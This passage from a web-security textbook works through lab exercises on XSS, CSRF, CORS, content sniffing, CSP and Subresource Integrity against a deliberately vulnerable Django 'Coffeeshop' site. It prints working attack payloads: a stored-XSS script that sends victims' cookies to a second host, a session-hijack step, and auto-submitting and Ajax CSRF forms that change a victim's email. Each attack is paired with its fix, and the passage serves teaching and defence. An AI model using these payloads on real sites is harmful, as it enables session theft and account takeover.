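link = "http://10.50.0.2/prod/?id=" + encoded
print(link)

# The server decodes the parameter back to the original script text.
assert unquote(encoded) == payload
```

The encoding does not change what the server receives. It only makes the
script less obvious to a victim who glances at the link.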
Another way to get someone else to execute your JavaScript is to get it
stored on the server. This is where Stored XSS comes in.
Stored XSS
Sometimes, user input is persisted in an application’s database and
then displayed in HTML pages. Examples include social media posts,
blog posts, product reviews, and so on. If an attacker can get malicious
JavaScript code stored there, it will be executed whenever another user
visits the page that displays that input. It will be executed as that user, with
that user’s cookies.
Our Coffeeshop application has one such vulnerability, in a form
where users can leave comments about products. We will exploit this in the
next exercise.
If you are logged in, you will see a box to enter a comment at the bottom of the
page. Enter
Nice coffee
<script>
alert(document.cookie)
</script>
Now reload the page. You will see the alert pop up with your session ID and the
CSRF cookie. If you log out and log in again as alice, then her cookies
will be displayed.
http://10.50.0.3/cookies/cookie-value
Take a look at the code in the views.py file for CSThirdparty. The
function is called cookies() and is quite simple.
One easy way of getting a GET URL called in JavaScript is to create an
<img> tag and set the source to our URL:
var i = document.createElement("img");
i.src = "http://... ";
There are other approaches, but this one is short and synchronous,
avoiding potential issues such as short comment fields in the database.
Still in Chrome as user bob, delete your comment with the Delete button.
Using the preceding img tag approach, we will create a new one using the
JavaScript shown before to call
http://10.50.0.3/cookies/cookie-value
Nice coffee
<script>
var i = document.createElement("img");
i.src = "http://10.50.0.3/cookies/" + document.cookie;
</script>
Reload the page and then have a look in the csthirdparty database. The
easiest way is to log into your CSThirdparty VM with
vagrant ssh
You should find the user’s cookies in the csthirdparty_cookies table with
An attacker can use the stolen session ID cookie to log in as the user it
belongs to. Log out from the Coffeeshop application and reload the page. Now
open the Developer Tools by clicking the three vertical dots in the top-right
corner of the browser; then select More Tools followed by Developer Tools.
Click on the Console icon. Type the following:
document.cookie="sessionid=session-id-from-database"
substituting the session ID value from the cookie you saved in the
CSThirdparty database.
Now refresh the page and close the Developer Tools. You should find that you
are now logged in as bob.
To clean up, delete the comment again. You can also delete the cookies from
the database.
DOM-Based XSS
DOM-based XSS vulnerabilities occur when an attacker can submit
JavaScript (through GET parameters, form input, etc.) that is used when
modifying the DOM programmatically, for example, using innerHTML.
Consider, for example, a page for reporting an error. When the URL
http://example.com/error?errortext=error-message
coffeeshopsite/coffeeshop/templates/coffeeshop/product.html
{{ comment.comment | safe }}
chrome://settings/siteData
http://10.50.0.2
We will fix the XSS vulnerability in the product comments using two methods:
1. Change the session cookie settings in settings.py.
SESSION_COOKIE_HTTPONLY = False
to
SESSION_COOKIE_HTTPONLY = True
Restart Apache with sudo apachectl restart and log in as bob again. Create
a new comment containing the alert() JavaScript that displays the cookie
(see the exercise “Exploiting a Stored XSS Vulnerability”), then reload
the page and confirm the session cookie is not displayed.
Note that the CSRF token cookie will still be displayed as this setting applies to
the session ID cookie only.
Delete the cookie before proceeding to method 2. Open product.html in
coffeeshop/vagrant/coffeeshopsite/coffeeshop/templates/
coffeeshop
and change
{{ comment.comment | safe }}
to
{{ comment.comment }}
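The effect of the two fixes can be illustrated outside Django with the
standard library. This is a sketch under stated assumptions: html.escape
is used here as a stand-in for what template autoescaping does once the
safe filter is removed, and the session ID value is a placeholder.

```python
import html
from http.cookies import SimpleCookie

# Method 2: escaping turns markup characters into harmless entities,
# so the browser displays the script text instead of running it.
comment = "Nice coffee <script>alert(document.cookie)</script>"
escaped = html.escape(comment)
print(escaped)

# Method 1: a cookie flagged HttpOnly is still sent with requests but
# is hidden from document.cookie in the browser.
cookie = SimpleCookie()
cookie["sessionid"] = "example-session-id"  # placeholder value
cookie["sessionid"]["httponly"] = True
print(cookie.output())
```

The two defenses are complementary. Escaping stops the script from
running at all, while HttpOnly limits the damage if some other script
does run.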
HTML Injection
Before leaving XSS, we should discuss the related vulnerability of HTML
injection. This occurs when an attacker can get HTML code interpreted
as part of a page. We include it here rather than in the section on injection
as it arises from the same vulnerability. The difference between this and
Stored XSS is that the injected text is HTML not JavaScript.
Even without JavaScript code, HTML injection can be harmful. An
attacker can deface a site by adding images with <img> tags or entire pages
with <iframe> tags. They can create links that can be used to track visitors
or deliver malware.
Defending against HTML injection is the same as against XSS—sanitize
user input.
7.8 Content Sniffing
We looked at potential vulnerabilities of file uploading in Chapter 5.
Among the defenses, we said developers should confirm that the file type
matches what is expected.
It is possible for a file to simultaneously be valid syntax for more than
one file type. These are called polyglot files. They can potentially be useful
to attackers because of a feature in browsers that causes them to change
the content type from what was given in the server’s HTTP response.
<script src="myimage.jpg"></script>
Most web servers derive the Content-Type header from the file
extension. When the client requests myimage.jpg, the server looks at the
extension and sends the image with Content-Type: image/jpeg. The
script should fail to execute.
However, many browsers try to be clever and assume the server has
made an error. The browser is expecting application/javascript but
receives image/jpeg. Believing the server may have sent the wrong content
type, it inspects the file to check if it is actually JavaScript. As the image
is both valid JPEG and JavaScript, the browser will decide it is actually a
script and will execute it.
This is a somewhat esoteric vulnerability, but it can be demonstrated
to be exploitable. Gareth Heyes at PortSwigger demonstrated that he can
create a file that is simultaneously valid JPEG and JavaScript.4 We have
extended this idea to create a script that can join (more or less) arbitrary
JPEG images and JavaScript files into one file, which is valid syntax for both.
If you look at your coffeeshop Git clone, you will see a directory called
other/jpgjs containing this script along with an example. The JPEG/
4 https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
<img src="hackedimage.jpg">
<script charset="ISO-8859-1" src="hackedimage.jpg"></script>
X-Content-Type-Options: nosniff
which instructs the browser not to perform this content inspection. It can
be added to all responses.
In Django, the nosniff header is enabled and disabled with the
SECURE_CONTENT_TYPE_NOSNIFF variable in settings.py. It is set to True
by default, adding the preceding header to all responses.
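Outside Django, the same header can be added by a thin wrapper around the
application. The following is a minimal WSGI sketch, not Django's own
implementation; the names add_nosniff, image_app, and collect_headers are
hypothetical and exist only for this illustration.

```python
def add_nosniff(app):
    """Wrap a WSGI app so every response carries the nosniff header."""

    def wrapped(environ, start_response):
        def start_with_nosniff(status, headers, exc_info=None):
            # Drop any existing copy so the header appears exactly once.
            headers = [(k, v) for (k, v) in headers
                       if k.lower() != "x-content-type-options"]
            headers.append(("X-Content-Type-Options", "nosniff"))
            return start_response(status, headers, exc_info)

        return app(environ, start_with_nosniff)

    return wrapped


def image_app(environ, start_response):
    """Hypothetical app that serves an uploaded image."""
    start_response("200 OK", [("Content-Type", "image/jpeg")])
    return [b"placeholder image bytes"]


def collect_headers(app):
    """Call the app once and return the headers it sent."""
    seen = {}

    def fake_start_response(status, headers, exc_info=None):
        seen["headers"] = dict(headers)

    list(app({}, fake_start_response))
    return seen["headers"]


print(collect_headers(add_nosniff(image_app)))
```

With the header present, a browser that honors it will refuse to execute
a response as a script when it is served as image/jpeg.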
7.9 Summary
Code that handles user input is a common source of vulnerabilities in web
applications. We saw that it gives attackers the opportunity to have their
own code executed on the server or by victims’ browsers.
We looked at how cookies work and how to set their parameters safely,
for example, by giving appropriate values to the SameSite parameter.
We examined user input–oriented vulnerabilities and how to secure
code against them.
CHAPTER 8
Cross-Site Requests
This chapter is about the threats that occur when your site accesses
other sites and when your site is accessed from another site. We saw
one example in the last chapter, in the exercise “Exploiting a Stored XSS
Vulnerability.” Here, you as the attacker were able to exploit a vulnerability
and upload malicious JavaScript that sent victims’ cookies to your site.
We will look at three features web browsers offer to protect against
cross-site attacks and to safely allow cross-site requests to legitimate servers:
Cross-Origin Resource Sharing (CORS), Content Security Policy (CSP),
and Subresource Integrity (SRI).
SOP is a client-side defense. A malicious user can still access your API
synchronously as only JavaScript calls are blocked. It is designed to protect
users from malicious sites that misuse your APIs. It does not protect your
APIs against calls from a malicious user (we need other defenses for that,
such as authentication).
Sometimes, however, we do want to allow these calls. For example, we
may have our API on a different port, or on a different host, from the rest
of the client. We may want to make a public API. Cross-Origin Resource
Sharing (CORS) enables us as developers to allow JavaScript cross-site
requests from sites we specifically name (or all sites, if we wish). This is a
security relaxation rather than a security feature; therefore, it should be
used cautiously. It relaxes SOP.
CORS is implemented as HTTP headers, but before we look at the
syntax, let us look at what CORS does. CORS divides requests into simple
and preflighted requests. Simple requests must satisfy the following rules:
–– Accept-Language
–– Content-Language
–– Content-Type
–– application/x-www-form-urlencoded
–– multipart/form-data
–– text/plain
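The distinction between simple and preflighted requests can be
approximated in a few lines of Python. This is a simplified sketch, not
the browser's actual algorithm. The function name needs_preflight is
hypothetical, the method list (GET, HEAD, POST) and the Accept header are
taken from the CORS specification rather than from the list above, and
only headers set by the calling script are considered (headers the
browser adds itself do not count).

```python
SIMPLE_METHODS = {"GET", "HEAD", "POST"}
SAFELISTED_HEADERS = {
    "accept", "accept-language", "content-language", "content-type",
}
SIMPLE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def needs_preflight(method, headers):
    """Return True if a cross-origin request would be preflighted."""
    if method.upper() not in SIMPLE_METHODS:
        return True
    for name, value in headers.items():
        lname = name.lower()
        if lname not in SAFELISTED_HEADERS:
            return True
        if lname == "content-type":
            # Ignore parameters such as "; charset=UTF-8".
            media_type = value.split(";", 1)[0].strip().lower()
            if media_type not in SIMPLE_CONTENT_TYPES:
                return True
    return False


print(needs_preflight("GET", {}))
print(needs_preflight("POST", {"Content-Type": "application/json"}))
```

A JSON POST or a request carrying a custom header such as X-CSRFToken
falls outside these rules, so the browser sends an OPTIONS request first.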
CORS and Credentials
The Access-Control-Allow-Credentials header needs special mention.
Ordinarily, cookies and authorization headers are not sent by the client in
a request, and they are not accepted in the response.
To enable cookies and authorization headers, the server has to set
Access-Control-Allow-Credentials to true in the response. Also, the
client has to set withCredentials to true in the XMLHttpRequest object.
The reason for the apparent redundancy of setting it twice is to provide
two-way protection: the client from a malicious server and vice versa.
Imagine only withCredentials was needed. Then an attacker could
write a malicious website evilhacker.com that made an API call to your
site. If one of your customers visits evilhacker.com, their credentials
would be passed to your site in the API call, logging them in. Then
evilhacker.com could perform operations as that user. This is a cross-site
request forgery attack, which we discuss in more detail in Section 8.2.
<VirtualHost *:80>
...
Header set Access-Control-Allow-Origin "https://example.com"
...
</VirtualHost>
INSTALLED_APPS = [
...
'corsheaders',
...
]
MIDDLEWARE = [
...
'corsheaders.middleware.CorsMiddleware',
...
]
An example is
CORS_ALLOWED_ORIGINS = [
'https://example.com',
'http://localhost:5000',
]
Note that CORS itself does not allow regular expressions in
Access-Control-Allow-Origin. The django-cors-headers module does the
matching, and if the request’s origin matches one of the regular
expressions, the Access-Control-Allow-Origin header is set to that origin.
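The matching step can be sketched as follows. This is an illustration of
the idea only, not the code used by django-cors-headers; the function
name cors_response_headers and the example pattern are hypothetical.

```python
import re

# Hypothetical pattern: any single-label subdomain of example.com.
ALLOWED_ORIGIN_REGEXES = [r"^https://\w+\.example\.com$"]


def cors_response_headers(origin, allow_credentials=False):
    """Return the CORS headers to add for a request from this origin."""
    headers = {}
    if origin and any(re.fullmatch(p, origin)
                      for p in ALLOWED_ORIGIN_REGEXES):
        # Echo the concrete origin back; the header cannot hold a regex.
        headers["Access-Control-Allow-Origin"] = origin
        # Tell caches that the response differs per requesting origin.
        headers["Vary"] = "Origin"
        if allow_credentials:
            headers["Access-Control-Allow-Credentials"] = "true"
    return headers


print(cors_response_headers("https://api.example.com"))
print(cors_response_headers("https://evilhacker.com"))
```

Anchoring the pattern at both ends matters. Without it, an origin such as
https://api.example.com.evilhacker.com could slip through.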
Other CORS headers can be added with the following variables:
CORS_ALLOW_ALL_ORIGINS = True
#CORS_ALLOWED_ORIGINS = []
CORS_ALLOW_CREDENTIALS = True
Start HTTP Toolkit and start a Firefox (not Chrome) window by clicking
the Firefox: Intercept a fresh independent Firefox window button. Visit
http://10.50.0.2/corstest. This page has three buttons which load
JSON data from three URLs on CSThirdparty:
1 https://github.com/adamchainz/django-cors-headers
Click on the Test GET button and look at the HTTP Toolkit window. Near the
bottom of the page you should see the GET request to /gettest. Notice that no
preflight request was made, just the GET. Click /gettest/ and scroll through the
response and notice the access-control-allow- headers. The
access-control-allow-origin header is set to http://10.50.0.2 even though
Django has CORS_ALLOW_ALL_ORIGINS = True. The django-cors-headers
module replaces the origin with that of the request when sending the
response.
Now click Test POST. You should see that the browser sent an OPTIONS
request before making the POST. At the time of writing, both Firefox and
Chrome display the OPTIONS request in their developer tools. However, certain
versions do not, and it may be removed in future releases. This is why we are
using HTTP Toolkit.
When you clicked on Test Credentials, the server set the corstest cookie,
with SameSite set to None.
Close the alert and click Test Credentials again. We can see that the server
received the corstest cookie it set in the previous click, but the
document.cookie variable does not contain corstest: it is not visible to
the page on 10.50.0.2.
This test is why we are using Firefox, not Chrome. Recall from earlier that
Chrome will not send the cookie without SameSite=None and Secure. We
cannot set Secure without first configuring HTTPS. At the time of writing, this
is not the case with Firefox. Later versions may also enforce this, so if your
cookie does not appear in the alert window, this may be the reason.
CORS_ALLOW_ALL_ORIGINS = False
CORS_ALLOWED_ORIGINS = []
CORS_ALLOW_CREDENTIALS = True
Reload the page and try each of the buttons again. When making the simple
GET request, the request is sent to the server, and the server sends the
response, but the browser does not let JavaScript read it. When making the
preflighted POST request, the OPTIONS request is made to the server, and the
server responds, but the client does not follow this with the POST request.
To end the exercise, return the CORS variables to their original values to allow
requests from all origins (or add http://10.50.0.2). This is needed by other
parts of the application. Remember to restart Apache.
https://bank.com/api/transfer?to=account-number&amt=amount
2 https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
The site uses session ID cookies to keep its users logged in between
requests. If the user is logged in, executing that API call will transfer funds
from their account to the recipient’s account.
Now imagine an attacker sends a customer of bank.com a link to that
URL. The account number is that of the attacker. Perhaps it is in an email
with the link text “Congratulations! You have won a prize. Click here to
claim it.” If the customer has already authenticated with bank.com (i.e.,
has a valid session ID), the API call will be successful, and funds will be
transferred to the attacker.
The process is illustrated in Figure 8-2. The hacker crafts a link and
sends it to the victim. The victim clicks it and unknowingly performs an
action in the hacker’s favor.
You have already seen one defense against this attack: don’t allow GET
requests to change state. This works because the attack relies on the hacker
being able to send the victim a link to click on. It is difficult to craft a POST
link and send it to the user.
However, if bank.com uses POST for the transfer API rather than
GET, the hacker can instead send the victim a link to their own site, say,
evilhacker.com, rather than to bank.com. The page on evilhacker.com
will contain an enticing link. Again, this may be encouraging the victim to
click on a link to claim a prize. The HTML might look like the following:
The link submits a form with hidden inputs. If the user has a session ID
cookie, the transaction will be executed.
The second link can be avoided by the attacker automating the form
submission with
window.onload = function() {
document.getElementById('myform').submit();
};
CSRF Tokens
Aside from session cookie settings, to prevent the preceding POST attack,
we would ideally like to confirm that the request originated from bank.
com, not a malicious site. One approach is to check the value of the Referer
header. However, this can be spoofed. The alternative is to use a CSRF
token. These are random, unguessable tokens sent to the client. The client
must include the token when submitting a form. The server verifies it is
correct before performing the action.
Tokens should be unique to a user’s session so that an attacker can’t
grab one in advance and paste it into the victim’s request. They should be
long enough to make guessing or brute force infeasible. There is an argument
for making the tokens unique per request, but as this adds usability
complexity, making tokens unique to the user’s session is also common.
There are two common patterns for CSRF tokens: the synchronizer
pattern and the double-submit cookie pattern.
The synchronizer pattern is illustrated in Figure 8-3. The server creates
a CSRF token and stores it in the database associated with the client’s
session. This is sent to the client in the page that contains the form, for
example, as a hidden <input> field. When the client submits the form, the
server validates the token in the form field with the value in the database.
The double-submit cookie pattern avoids storing the CSRF token
server side; therefore, it works when there is no session. It is illustrated in
Figure 8-4. The server sends the token both as a hidden <input> field and
as a cookie. When the client submits the form, the server checks that the
form element and cookie match.
Both methods provide CSRF protection by requiring the client to make
two requests in order to submit a form: one to get the CSRF token and the
other to submit it. It is difficult for an attacker to automate this with a link
sent to the victim.
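The two patterns differ only in what the submitted token is compared
against. The following minimal sketch shows both checks. It is not
Django's implementation: the function names are hypothetical, and a plain
dictionary stands in for the server-side session store.

```python
import hmac
import secrets


def new_csrf_token():
    """Generate a long, unguessable token."""
    return secrets.token_urlsafe(32)


def _same(a, b):
    # Constant-time comparison avoids leaking how many characters match.
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def check_synchronizer(session, form_token):
    """Synchronizer pattern: compare with the token stored server side."""
    expected = session.get("csrf_token")
    if not expected or not form_token:
        return False
    return _same(expected, form_token)


def check_double_submit(cookie_token, form_token):
    """Double-submit pattern: compare the cookie with the form field."""
    if not cookie_token or not form_token:
        return False
    return _same(cookie_token, form_token)


token = new_csrf_token()
session = {"csrf_token": token}  # stand-in for a real session store
print(check_synchronizer(session, token))
print(check_double_submit(token, "guessed-value"))
```

In both cases a missing token is treated as a failure, so a request that
simply omits the field or the cookie is rejected.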
{% csrf_token %}
For API calls, the CSRF token can instead be passed in the X-CSRFToken
header. For example, we could use the following jQuery ajax() call:
$.ajax({
    type: "POST",
    url: "https://bank.com/api/transfer/",
    data: $('#myform').serialize(),
    contentType: "application/x-www-form-urlencoded",
    headers: {
        // getCookie() is assumed to be a helper that reads the named cookie
        "X-CSRFToken": getCookie("csrftoken")
    },
    success: function(data){
        ...
    },
});
CSRF Attacks
CSRF tokens, cookie SameSite settings, and POST requests vs. GET all help
defend against CSRF attacks. There are other defenses, but to understand
them better, let’s launch a CSRF attack against a Coffeeshop user.
3 https://docs.djangoproject.com/en/3.2/ref/csrf/
At the time of writing, Firefox’s default cookie SameSite setting is None.
Unlike Chrome, the Secure flag does not have to be set for cookies to be
sent (see Section 7.2 for a discussion). It may be that by the time you read
this book, the latest version of Firefox, like Chrome, defaults SameSite
to Lax and requires Secure to be set when SameSite is None. If you find
that this is the case, the following exercise, “Launching a CSRF Attack,”
will not work. You can still do it by first performing the following steps
before starting the exercise:
1. Edit coffeeshopsite/coffeeshopsite/settings.py. Change
SESSION_COOKIE_SAMESITE = None
SESSION_COOKIE_SECURE = False
to
cd /vagrant/coffeeshopsite
python3 manage.py runsslserver 0:8100
https://10.50.0.2:8100
The HTML contains a hidden form that calls this URL with the Evil Hacker’s
email address. The URL requires the current email address to be sent along
with the new one, so the page prompts the victim for this. Enter Bob’s email
address [email protected] and click Submit. The Submit button puts the victim’s
typed email address into the hidden form and submits it.
You will notice two things. Visit http://10.50.0.2 and click My Account.
You will see the email address has been changed. Use this opportunity to
change it back to [email protected].
The other thing you will notice is that after clicking Submit, a page is displayed
confirming Bob’s email address has been changed. This is likely to alert Bob to
the fact his account has been hacked. Most likely, he will immediately change his
email address back (unless the Evil Hacker is very quick in resetting the password).
Ideally, as a hacker, we would like to hide the response page. Open the HTML
template
csthirdparty/vagrant/csthirdpartysite/csthirdparty/templates/
csthirdparty/youhavewon.html
Uncomment the Ajax call and comment out form.submit(). Your function
should look like the following:
function sendemail() {
    var enteredemail = document.getElementById('enteredemail').value;
    var form = document.getElementById('changeemailform');
    document.getElementById('old_email').setAttribute('value', enteredemail);
    //form.submit()
    $.ajax({
        type: "POST",
        url: "http://10.50.0.2/changeemail",
        data: $('#changeemailform').serialize(),
        // serializes the form's elements.
        xhrFields: {
            withCredentials: true
        },
        success: function(html){
            alert("Thank you. We will contact you shortly")
        },
        crossDomain: true
    });
}
Restart Apache in the CSThirdparty VM and reload the page. Now enter
Bob’s email again and click Submit. This time you will see a more deceptive
response, and Bob’s email has still been changed.
CSRF tokens would have prevented both these attacks. However, the
attacker may have been able to request one in an Ajax request. When the
form is submitted, JavaScript code makes an Ajax request to a page that
contains the CSRF token and parses the response to extract the CSRF
token. It has to be in the body of the message, for example, in a hidden
<input> field or JSON response. If it were just in a cookie, our page would
not be able to read it as it is a cross-site request.
The other requirement is that the site does not check that the CSRF
token is sent as a cookie by the client. Again, as we are making a cross-site
request, we cannot send a cookie to 10.50.0.2.
Django’s default CSRF mechanism is the double-submit cookie
pattern that does require the CSRF token to be in a cookie. Therefore,
the preceding attack would not work. Django supports the alternative
synchronizer pattern. This does not require that the CSRF token
be in a cookie and also does not set it in one. The preceding attack
would therefore succeed. We will try this in the next exercise. Again,
Now edit Coffeeshop’s settings.py. At the end, you will see the line
#CSRF_USE_SESSIONS = True
Uncomment this line and restart Apache. This switches Django’s CSRF
handling from the double-submit cookie method to the synchronizer pattern.
Now click on the Test CSRF button again. This time
http://10.50.0.2/testcsrftoken will succeed.
We have demonstrated that we can make a CSRF attack even if a CSRF token
is required, but only if it doesn’t have to be present in a cookie.
CSRF and CORS
The last exercise demonstrated that CSRF tokens do not protect against all
CSRF attacks. However, CSRF tokens together with the Same-Origin Policy do.
Recall that if an Ajax request is preflighted, the browser first sends a
preflight OPTIONS request. Unless the origin were allowed, the browser
would not follow it with the original request.
If the Ajax request is simple, the browser would reject the response,
but as we saw in Section 8.1, the action would still have been performed on
the server.
Both our asynchronous Ajax calls were preflighted because they include
nonstandard headers, specifically Cookie. This is why modern browsers first
make preflight requests—to prevent actions being executed on the server.
Our synchronous form submission would still have been executed
because it is not made through XMLHttpRequest. However, when a CSRF
token is required, the only way to fetch this is with the preflighted Ajax
request.
Our attacks worked because we used CORS to override the Same-
Origin Policy (SOP). If we remove the @csrf_exempt decorator and switch
CORS off with
CORS_ALLOW_ALL_ORIGINS = False
CORS_ALLOWED_ORIGINS = []
then the CSRF attacks no longer work, neither with cookie- nor session-
based CSRF tokens.
• CSRF_COOKIE_AGE
• CSRF_COOKIE_DOMAIN
• CSRF_COOKIE_HTTPONLY
• CSRF_COOKIE_PATH
• CSRF_COOKIE_SAMESITE
• CSRF_COOKIE_SECURE
CSRF Summary
The safest strategy for preventing CSRF attacks is to do all of the following:
With X-Frame-Options set, the page would fail to load, but the action
would still be executed and the response sent. A CSRF token and SOP
prevent the attack because the CSRF token cannot be fetched.
where
The most common directives are fetch directives, which define the
allowed origins for a type of resource. The value is a list of origins. An
example is
Recall the exercise in Section 7.7 where we were able to steal session
cookies by sending them to an Evil Hacker’s URL using an <img> tag:
<script>
var i = document.createElement("img");
i.src = "http://10.50.0.3/cookies/" + document.cookie;
</script>
4 https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
Directive                  Meaning
Fetch Directives
child-src                  Web workers and nested browsing contexts, for example, in <frame> and <iframe> tags
connect-src                Resources loaded through script interfaces (e.g., XMLHttpRequest)
default-src                Default source if not overridden by another
font-src                   Fonts loaded using @font-face in CSS
frame-src                  Resources loaded in <frame> and <iframe> tags
img-src                    Images and favicons
manifest-src               Manifest files
media-src                  Media resources in <audio>, <video>, and <track> tags
object-src                 Resources in <object>, <embed>, and <applet> tags
Reporting Directives
report-uri                 When a CSP violation occurs, a JSON report is sent by POST to this URI
report-to                  Fires a SecurityPolicyViolationEvent (intended to replace report-uri)
Other Directives
require-sri-for            Script and stylesheet resources for which an SRI is required (see Section 8.5)
require-trusted-types-for  Enforce trusted types
upgrade-insecure-requests  Treat HTTP requests from these origins as though they were served over HTTPS (if the requesting document were loaded over HTTPS, these may refuse to load otherwise)
<script nonce="jfdgikHH7fgj6KJH">
...
</script>
Include the same nonce value in the CSP header, for example:
Content-Security-Policy: default-src *;
    script-src 'self' https://cdn.example.com 'nonce-jfdgikHH7fgj6KJH'
Nonces are only secure if they change with each page load; therefore,
both the document body and Content-Security-Policy header need to
be dynamically generated.
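As a minimal sketch of what "dynamically generated" means here, the following Python generates a fresh nonce for each response and places the same value in both the header and the script tag. The function names and the inline script are illustrative assumptions, not part of any framework.

```python
import secrets


def make_nonce() -> str:
    """Return a fresh, unpredictable nonce for a single HTTP response."""
    return secrets.token_urlsafe(16)


def csp_header_value(nonce: str) -> str:
    """Build a script-src policy that admits only scripts carrying this nonce."""
    return f"script-src 'self' 'nonce-{nonce}'"


def render_page(nonce: str) -> str:
    """Hypothetical stand-in for a template: the same nonce goes in the tag."""
    return f'<script nonce="{nonce}">currentSlide(1);</script>'


nonce = make_nonce()               # one nonce per page load
header = csp_header_value(nonce)   # value for the Content-Security-Policy header
body = render_page(nonce)          # document body using the same nonce
```

Because the nonce comes from a cryptographically secure random source and is never reused, an attacker who injects a script tag cannot guess the value needed to make it run.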
Nonces given in a script-src policy directive also apply to event
handlers. Therefore, the preceding setting for script-src would prevent
the following JavaScript from executing, as it does not have a nonce:
If you wish to protect inline <script> tags but not event handlers, you
can use the script-src-elem directive instead of script-src. This does
weaken protection against XSS as attackers can add JavaScript to event
handlers such as onclick and onmouseover.
An alternative to nonces is SHA hashes. These can be 256, 384, or
512 bits. To use them, create a Base64-encoded hash of your inline script
(excluding the <script> and </script> tags), for example, with openssl:
Content-Security-Policy: default-src *;
    script-src 'self' https://cdn.example.com 'sha256-your-sha-hash'
The advantage of SHA hashes over nonces is that your HTML file
does not need to be dynamically created. The disadvantage is you have to
recompute the SHA hash each time the script changes.
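The hash value can also be computed in Python. The sketch below hashes the text between the script tags (whitespace included, since browsers hash the content exactly as it appears) and formats it as a CSP source expression. The function name and the sample script are assumptions for illustration.

```python
import base64
import hashlib


def csp_hash_source(script_text: str) -> str:
    """Return a CSP source expression such as 'sha256-...' for an inline script.

    script_text is the exact text between <script> and </script>.
    """
    digest = hashlib.sha256(script_text.encode("utf-8")).digest()
    return "'sha256-" + base64.b64encode(digest).decode("ascii") + "'"


# Illustrative inline script; every character, including newlines, is hashed.
inline_script = "\n$( document ).ready(function() {\n    currentSlide(1);\n});\n"
print(csp_hash_source(inline_script))
```

The printed value, quotes included, is what goes into the script-src directive.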
If you do not want to use nonces or SHA hashes but still want to
support inline scripts, you can use 'unsafe-inline'. For example:
Content-Security-Policy: default-src *;
    script-src 'self' https://cdn.example.com 'unsafe-inline'
will allow inline <script> tags and event handlers without a hash or nonce. It
is considered unsafe because it negates CSP’s protection against XSS.
CSP allows additional policy directives beyond those that define
document sources. We will not describe all in this book. See Mozilla’s MDN
Web Docs entry for details. The reporting directives are useful, however,
and they are described in the following.
CSP Reporting
Developers and site operators often want to know if a resource has been
blocked. Firstly, it may be an indication that an XSS or other attack
has been attempted. Secondly, the CSP header may be inaccurate and
resources blocked unintentionally. CSP provides two directives for this
purpose: report-uri and report-to.
The report-uri directive allows you to define a URL that CSP
violations will be sent to. The URI is called as a POST request with the
violation in the body as a JSON report. An example is
Report-To: {
    "group": "csp-violation",
    "max_age": 2592000,
    "endpoints": [
        { "url": "https://example.com/csp-violation" }
    ] }
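To illustrate what a report-uri endpoint receives, the following sketch parses the JSON body of a violation report and produces a one-line summary. Browsers wrap the report in a "csp-report" object; the sample values and the function name are assumptions for illustration.

```python
import json


def summarize_csp_report(body: bytes) -> str:
    """Turn the JSON body of a report-uri POST into a one-line summary."""
    report = json.loads(body.decode("utf-8")).get("csp-report", {})
    return (
        f"{report.get('violated-directive', '?')} blocked "
        f"{report.get('blocked-uri', '?')} on {report.get('document-uri', '?')}"
    )


# Hypothetical report, shaped like those sent for a blocked image.
sample = json.dumps({
    "csp-report": {
        "document-uri": "https://example.com/gallery/",
        "violated-directive": "img-src 'self' data:",
        "blocked-uri": "http://10.50.0.3/static/image1.jpg",
    }
}).encode("utf-8")
print(summarize_csp_report(sample))
```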
CSP in Django
The Django-CSP package integrates CSP header handling into Django. It
allows developers to set CSP headers using variables in settings.py and
provides nonce functionality. Install it with
@csp_exempt
def myview(request):
...
def myview(request):
...
response = HttpResponse(body)
response._csp_exempt = True
return response
@csp_update(IMG_SRC="images.example.com")
def myview(request):
...
@csp_replace(IMG_SRC="images.example.com")
def myview(request):
...
Nonces in Django
Django-CSP supports nonces. Define which directives to include a nonce
for with CSP_INCLUDE_NONCE_IN, for example:
CSP_INCLUDE_NONCE_IN = ('script-src',)
Django will create a new one per page load and include it in the
header. In the <script> tag in your template, include the nonce with
<script nonce="{{request.csp_nonce}}">
5
https://django-csp.readthedocs.io/en/latest/index.html
CSP IN DJANGO
The Coffeeshop application has a photo gallery that loads images from
CSThirdparty. We use it to explore CSP settings. Open the Coffeeshop
application in a web browser and click Gallery in the top menu bar.
Three images are loaded from 10.50.0.3 and presented as a slideshow. The
slideshow JavaScript code is also loaded from 10.50.0.3. A small amount of
inline JavaScript code is in the gallery page to initialize the slideshow:
<script>
$( document ).ready(function() {
currentSlide(1);
});
</script>
The data: scheme is in the CSP directive because the forward and back
icons in the slideshow are loaded as inline SVG with this scheme. Add a CSP
line to restrict image loading to just 'self' (and data:). Also tell Django-CSP
to include nonces in script tags:
Restart Apache, reload the page, and observe the images no longer load.
CSP violations are sent to the URI /email_csp_report/. This maps to the
view email_csp_report(), which emails the JSON report. Open MailCatcher
and view the emails. Now change your CSP settings to allow the images to load:
Restart Apache.
Let’s protect our scripts. In the settings.py, add a new CSP directive for
scripts with the following line:
CSP_SCRIPT_SRC = ("*",)
Restart Apache and reload the page. The slideshow should fail because CSP
prevents the <script> … </script> block at the end of the page, plus the
<script> tags at the beginning that load the JavaScript files, from loading.
Open the gallery.html template file. For each of the two <script> tags,
add the following attribute:
nonce="{{request.csp_nonce}}"
Also do this to the <script> tags in base.html. This is the base template
that is included by all other templates, including gallery.html.
There is one more thing to fix. The slideshow.js file adds an inline event
handler for when the forward and back buttons, and the dot icons, are
clicked. This is still blocked by CSP. Unblock them by adding the following to
settings.py:
Restart Apache, reload the page, and the slideshow should work again. Clean
up by restoring CSP to its original settings:
You can leave the nonces in the templates: they are not used unless
required by CSP.
Paste the resulting hash into the integrity attribute of the <script> or
<link> tag, for example:
Access-Control-Allow-Origin: *
Let’s add Subresource Integrity checking for the slideshow.js script loaded
from the CSThirdparty site into the gallery page.
First, make sure CORS is enabled in CSThirdparty, for example, with the
following line in settings.py:
CORS_ALLOW_ALL_ORIGINS = True
/vagrant/csthirdpartysite/csthirdparty/static/csthirdparty/js
cat /vagrant/csthirdpartysite/csthirdparty/static/csthirdparty/
js/slideshow.js | \
openssl dgst -sha256 -binary | openssl base64
In real life, you may not have access to the server that hosts the file, but you
can fetch it with Curl:
curl http://10.50.0.3/static/csthirdparty/js/slideshow.js
